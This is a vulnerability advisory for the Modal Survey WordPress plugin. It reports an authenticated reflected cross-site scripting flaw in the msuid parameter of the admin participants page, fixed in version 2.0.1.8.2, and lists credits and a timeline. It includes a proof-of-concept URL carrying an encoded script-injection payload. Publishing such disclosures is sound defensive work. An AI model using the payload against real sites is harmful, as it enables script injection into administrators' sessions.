Modal Survey < 2.0.1.8.2 - Authenticated Reflected Cross-Site Scripting (XSS)
Description
The plugin did not sanitise the msuid parameter from the survey participants page in the admin Dashboard, leading to a reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/admin.php?page=modal_survey_participants&msuid=%27%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
Affects Plugins
Fixed in version 2.0.1.8.2✓
Classification
Miscellaneous
Original Researcher
Pagely
Submitter
John Castro
Submitter website
Submitter twitter
Verified
No
Timeline
Publicly Published
2021-01-08 (about 8 months ago)
Added
2021-01-08 (about 8 months ago)
Last Updated
2021-01-09 (about 8 months ago)